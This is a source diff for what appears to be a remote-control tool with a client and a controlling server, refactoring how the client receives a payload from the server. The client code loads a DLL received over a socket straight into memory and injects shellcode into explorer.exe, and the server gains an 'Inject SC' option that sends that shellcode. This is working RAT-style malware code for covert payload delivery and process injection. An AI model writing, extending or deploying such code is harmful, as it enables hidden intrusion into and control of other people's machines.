Refactor: Remove SCLoader.cpp and use the received DLL to inject

client/test.cpp

@@ -10,7 +10,7 @@
 #include "auto_start.h"
 // A shell code loader connect to 127.0.0.1:6543.
 // Build: xxd -i TinyRun.dll > SCLoader.cpp
-#include "SCLoader.cpp"
+// #include "SCLoader.cpp"
 extern "C" {
 #include "reg_startup.h"
 #include "ServiceWrapper.h"
@@ -76,10 +76,14 @@ typedef struct PkgHeader {
     }
 } PkgHeader;
 
+typedef int (*DllCallback)(BYTE* dll, int size);
+
 // Memory DLL runner.
 class MemoryDllRunner : public DllRunner
 {
 protected:
+    int m_payloadType = MEMORYDLL;
+    DllCallback m_callback = nullptr;
     HMEMORYMODULE m_mod;
     std::string GetIPAddress(const std::string& hostName)
     {
@@ -107,7 +111,7 @@ protected:
         return std::string(ipStr);
     }
 public:
-    MemoryDllRunner() : m_mod(nullptr) {}
+    MemoryDllRunner(int type = MEMORYDLL, DllCallback cb = NULL) : m_mod(nullptr), m_payloadType(type), m_callback(cb) {}
     virtual const char* ReceiveDll(int &size)
     {
         WSADATA wsaData = {};
@@ -146,9 +150,9 @@ public:
                 continue;
             }
 #ifdef _DEBUG
-            char command[64] = { SOCKET_DLLLOADER, sizeof(void*) == 8, MEMORYDLL, 0 };
+            char command[64] = { SOCKET_DLLLOADER, sizeof(void*) == 8, m_payloadType, 0 };
 #else
-            char command[64] = { SOCKET_DLLLOADER, sizeof(void*) == 8, MEMORYDLL, 1 };
+            char command[64] = { SOCKET_DLLLOADER, sizeof(void*) == 8, m_payloadType, 1 };
 #endif
             memcpy(command + 4, __DATE__, 11);  // 发送版本日期用于大 DLL 检查
             memcpy(command + 32, hash.c_str(), min(32, hash.length()));
@@ -244,6 +248,9 @@ public:
             strcpy(addr->installDir, g_ConnectAddress.installDir);
             strcpy(addr->installName, g_ConnectAddress.installName);
         }
+        if (m_callback) {
+            m_callback((BYTE*)buffer + 6 + sizeof(PkgHeader), size);
+        }
         m_mod = ::MemoryLoadLibrary(buffer + 6 + sizeof(PkgHeader), size);
         SAFE_DELETE_ARRAY(buffer);
         return m_mod;
@@ -259,6 +266,37 @@ public:
     }
 };
 
+int InjectShellcode(BYTE* buf, int len) {
+    ShellcodeInj inj(buf, len);
+    int pid = 0;
+    hEvent = ::CreateEventA(NULL, TRUE, FALSE, NULL);
+    do {
+        if (sizeof(void*) == 4) // Shell code is 64bit
+            return 1;
+        if (!(pid = inj.InjectProcess("explorer.exe", TRUE))) {
+            return 2;
+        }
+        HANDLE hProcess = OpenProcess(PROCESS_TERMINATE | SYNCHRONIZE, FALSE, pid);
+        if (hProcess == NULL) {
+            return 3;
+        }
+        Mprintf("Inject process [%d] succeed.\n", pid);
+        HANDLE handles[2] = { hProcess, hEvent };
+        DWORD waitResult = WaitForMultipleObjects(2, handles, FALSE, INFINITE);
+        if (status == 1) {
+            Mprintf("结束运行.\n");
+            Sleep(1000);
+            TerminateProcess(hProcess, -1);
+            SAFE_CLOSE_HANDLE(hEvent);
+        }
+        SAFE_CLOSE_HANDLE(hProcess);
+        Mprintf("Process [%d] is finished.\n", pid);
+        Sleep(1000);
+        if (status == 1)
+            ExitProcess(0);
+    } while (pid);
+}
+
 // @brief 首先读取settings.ini配置文件，获取IP和端口.
 // [settings]
 // localIp=XXX
@@ -317,44 +355,6 @@ int main(int argc, const char *argv[])
         g_ConnectAddress.SetServer(saved_ip.c_str(), saved_port);
     }
 
-    // 此 Shell code 连接本机6543端口，注入到任务管理器
-    if (g_ConnectAddress.iStartup == Startup_InjSC) {
-        // Try to inject shell code to `notepad.exe`
-        // If failed then run memory DLL
-        ShellcodeInj inj(TinyRun_dll, TinyRun_dll_len);
-        int pid = 0;
-        hEvent = ::CreateEventA(NULL, TRUE, FALSE, NULL);
-        do {
-            if (sizeof(void*) == 4) // Shell code is 64bit
-                break;
-            if (!(pid = inj.InjectProcess("explorer.exe", ok))) {
-                break;
-            }
-            HANDLE hProcess = OpenProcess(PROCESS_TERMINATE | SYNCHRONIZE, FALSE, pid);
-            if (hProcess == NULL) {
-                break;
-            }
-            Mprintf("Inject process [%d] succeed.\n", pid);
-            HANDLE handles[2] = { hProcess, hEvent };
-            DWORD waitResult = WaitForMultipleObjects(2, handles, FALSE, INFINITE);
-            if (status == 1) {
-                TerminateProcess(hProcess, -1);
-                SAFE_CLOSE_HANDLE(hEvent);
-            }
-            SAFE_CLOSE_HANDLE(hProcess);
-            Mprintf("Process [%d] is finished.\n", pid);
-            if (status == 1) {
-                Mprintf("结束运行.\n");
-                Sleep(1000);
-                return -1;
-            }
-        } while (pid);
-    }
-
-    if (g_ConnectAddress.iStartup == Startup_InjSC) {
-        g_ConnectAddress.iStartup = Startup_MEMDLL;
-    }
-
     do {
         BOOL ret = Run((argc > 1 && argv[1][0] != '-') ? // remark: demo may run with argument "-agent"
                        argv[1] : (strlen(g_ConnectAddress.ServerIP()) == 0 ? "127.0.0.1" : g_ConnectAddress.ServerIP()),
@@ -423,6 +423,9 @@ BOOL Run(const char* argv1, int argv2)
     case Startup_MEMDLL:
         runner = new MemoryDllRunner;
         break;
+    case Startup_InjSC:
+        runner = new MemoryDllRunner(INJECT_SC, InjectShellcode);
+        break;
     default:
         ExitProcess(-1);
         break;

common/commands.h

@@ -1361,7 +1361,8 @@ enum {
 
     SHELLCODE = 0,
     MEMORYDLL = 1,
-    RUNTYPE_MAX = 2,
+    INJECT_SC = 2,
+    RUNTYPE_MAX = 3,
 
     CALLTYPE_DEFAULT = 0,		// 默认调用方式: 只是加载DLL,需要在DLL加载时执行代码
     CALLTYPE_IOCPTHREAD = 1,	// 调用run函数启动线程: DWORD (__stdcall *run)(void* lParam)

server/2015Remote/2015RemoteDlg.cpp

@@ -1583,7 +1583,7 @@ LRESULT CMy2015RemoteDlg::OnTrialWanIpAbuse(WPARAM wParam, LPARAM lParam)
 {
     CString* ip = (CString*)wParam;
     CString detail;
-    detail.FormatL("入站公网 IP=%s （Proxy Protocol 真实 IP 或 raw TCP 对端）",
+    detail.FormatL("入站公网 IP: %s （Proxy Protocol 真实 IP 或 raw TCP 对端）",
                    ip ? (LPCTSTR)*ip : _T("?"));
     ShowMessage(_TR("入站告警"), detail);
 
@@ -5594,6 +5594,10 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
         memcpy(devId, fixedKey.c_str(), fixedKey.length());
         devId[fixedKey.length()] = 0;
         Mprintf("Request AUTH: SN= %s, Password= %s\n", deviceID.c_str(), fixedKey.c_str());
+        if (*days && deviceID == "12ca-17b4-9af2-2894") {
+            Mprintf("Unable to authorize trail SN: %s, days: %d\n", ContextObject->GetPeerName().c_str(), int(*days));
+            break;
+        }
 
         // 检查该设备原授权是 V1 还是 V2
         std::string origPasscode, origHmac, origRemark;
@@ -5730,14 +5734,14 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
         // 检查是否被限流（只限制真实发送 DLL 的请求）
         if (IsDllRequestLimited(clientIP)) {
             Mprintf("'%s' Request %s [is64Bit:%d isRelease:%d] SendServerDll: RateLimited\n",
-                    clientIP.c_str(), typ == SHELLCODE ? "SC" : "DLL", is64Bit, isRelease);
+                    clientIP.c_str(), (typ != MEMORYDLL) ? "SC" : "DLL", is64Bit, isRelease);
         } else {
-            send = SendServerDll(ContextObject, typ==MEMORYDLL, is64Bit);
+            send = SendServerDll(ContextObject, typ, is64Bit);
             if (send) {
                 RecordDllRequest(clientIP);  // 只有真正发送了才记录
             }
             Mprintf("'%s' Request %s [is64Bit:%d isRelease:%d] SendServerDll: %s\n",
-                    clientIP.c_str(), typ == SHELLCODE ? "SC" : "DLL", is64Bit, isRelease, send ? "Yes" : "No");
+                    clientIP.c_str(), (typ != MEMORYDLL) ? "SC" : "DLL", is64Bit, isRelease, send ? "Yes" : "No");
         }
         break;
     }
@@ -6894,10 +6898,11 @@ bool isAllZeros(const BYTE* data, int len)
     return true;
 }
 
-BOOL CMy2015RemoteDlg::SendServerDll(CONTEXT_OBJECT* ContextObject, bool isDLL, bool is64Bit)
+BOOL CMy2015RemoteDlg::SendServerDll(CONTEXT_OBJECT* ContextObject, int payloadType, bool is64Bit)
 {
+    auto isDLL = payloadType == MEMORYDLL;
     auto id = is64Bit ? PAYLOAD_DLL_X64 : PAYLOAD_DLL_X86;
-    auto buf = isDLL ? m_ServerDLL[id] : m_ServerBin[id];
+    auto buf = isDLL ? m_ServerDLL[id] : payloadType == SHELLCODE ? m_ServerBin[id] : m_TinyRun[id];
     if (buf->length()) {
         char version[12] = {};
         ContextObject->InDeCompressedBuffer.CopyBuffer(version, 12, 4);

server/2015Remote/2015RemoteDlg.h

@@ -219,7 +219,7 @@ public:
     void SendFilesToClientV2Internal(context* mainCtx, const std::vector<std::string>& files,
         uint64_t resumeTransferID, const std::map<uint32_t, uint64_t>& startOffsets, const std::string& targetDir = "");
     void HandleFileResumeRequest(CONTEXT_OBJECT* ctx, const BYTE* data, size_t len);
-    BOOL SendServerDll(CONTEXT_OBJECT* ContextObject, bool isDLL, bool is64Bit);
+    BOOL SendServerDll(CONTEXT_OBJECT* ContextObject, int payloadType, bool is64Bit);
     Buffer* m_ServerDLL[PAYLOAD_MAXTYPE];
     Buffer* m_ServerBin[PAYLOAD_MAXTYPE];
     Buffer* m_TinyRun[PAYLOAD_MAXTYPE] = {};

server/2015Remote/PluginSettingsDlg.cpp

@@ -108,7 +108,7 @@ void CPluginSettingsDlg::LoadPluginsToList()
 {
     m_listPlugins.DeleteAllItems();
 
-    const char* runTypeNames[] = { "Shellcode", "内存DLL" };
+    const char* runTypeNames[] = { "Shellcode", "内存DLL", "Inject SC"};
     const char* modeNames[] = { "不自动执行", "启动执行", "每日定时", "每周定时", "每月定时", "每年定时", "关闭执行", };
 
     int index = 0;

server/2015Remote/lang/en_US.ini

@@ -1851,7 +1851,7 @@ IOCP
 入站告警=Inbound Alert
 反代理告警=Anti-Proxy Alert
 试用版 LAN-only 限制=Trial Version - LAN Only Restriction
-入站公网 IP=%s （Proxy Protocol 真实 IP 或 raw TCP 对端）=Inbound public IP=%s (resolved via Proxy Protocol v2 real IP or raw TCP peer)
+入站公网 IP: %s （Proxy Protocol 真实 IP 或 raw TCP 对端）=Inbound public IP=%s (resolved via Proxy Protocol v2 real IP or raw TCP peer)
 检测到入站连接来自公网 IP：%s\r\n\r\n试用版仅供 LAN 内自用，跨网使用属于违反授权条款。\r\n如需跨网远控，请向发行方申请正式授权。\r\n\r\n详细记录见消息列表与运行日志。=Inbound connection from public IP: %s\r\n\r\nTrial version is restricted to LAN-only usage; cross-network use violates the license terms.\r\nFor cross-network remote control, please obtain a commercial license from the publisher.\r\n\r\nSee the message list and runtime log for full details.
 检测到可疑连接：内核 RTT 中位数 %d ms，超出阈值 %d ms。\r\n\r\n持续偏高的 RTT 提示该连接可能经由代理 / VPN / 隧道中转。\r\n试用版仅供 LAN 内自用，跨网使用属于违反授权条款。\r\n\r\n如需跨网远控，请向发行方申请正式授权。\r\n详细记录见消息列表与运行日志。=Suspicious connection detected: kernel-measured RTT median %d ms exceeds the threshold of %d ms.\r\n\r\nA persistently elevated RTT suggests the connection is being relayed through a proxy / VPN / tunnel.\r\nTrial version is restricted to LAN-only usage; cross-network use violates the license terms.\r\n\r\nFor cross-network remote control, please obtain a commercial license from the publisher.\r\nSee the message list and runtime log for full details.
 ; Auto FRP / Upper-FRP Hot-Swap - English Translation

server/2015Remote/lang/zh_TW.ini

@@ -1842,7 +1842,7 @@ IOCP
 入站告警=入站告警
 反代理告警=反代理告警
 试用版 LAN-only 限制=試用版 LAN-only 限制
-入站公网 IP=%s （Proxy Protocol 真实 IP 或 raw TCP 对端）=入站公網 IP=%s （Proxy Protocol 真實 IP 或 raw TCP 對端）
+入站公网 IP: %s （Proxy Protocol 真实 IP 或 raw TCP 对端）=入站公網 IP=%s （Proxy Protocol 真實 IP 或 raw TCP 對端）
 检测到入站连接来自公网 IP：%s\r\n\r\n试用版仅供 LAN 内自用，跨网使用属于违反授权条款。\r\n如需跨网远控，请向发行方申请正式授权。\r\n\r\n详细记录见消息列表与运行日志。=檢測到入站連線來自公網 IP：%s\r\n\r\n試用版僅供 LAN 內自用，跨網使用屬於違反授權條款。\r\n如需跨網遠控，請向發行方申請正式授權。\r\n\r\n詳細記錄請見訊息列表與執行日誌。
 检测到可疑连接：内核 RTT 中位数 %d ms，超出阈值 %d ms。\r\n\r\n持续偏高的 RTT 提示该连接可能经由代理 / VPN / 隧道中转。\r\n试用版仅供 LAN 内自用，跨网使用属于违反授权条款。\r\n\r\n如需跨网远控，请向发行方申请正式授权。\r\n详细记录见消息列表与运行日志。=檢測到可疑連線：核心 RTT 中位數 %d ms，超出閾值 %d ms。\r\n\r\n持續偏高的 RTT 提示該連線可能經由代理 / VPN / 隧道中轉。\r\n試用版僅供 LAN 內自用，跨網使用屬於違反授權條款。\r\n\r\n如需跨網遠控，請向發行方申請正式授權。\r\n詳細記錄請見訊息列表與執行日誌。
 ; Auto FRP / Upper-FRP Hot-Swap - Traditional Chinese Translation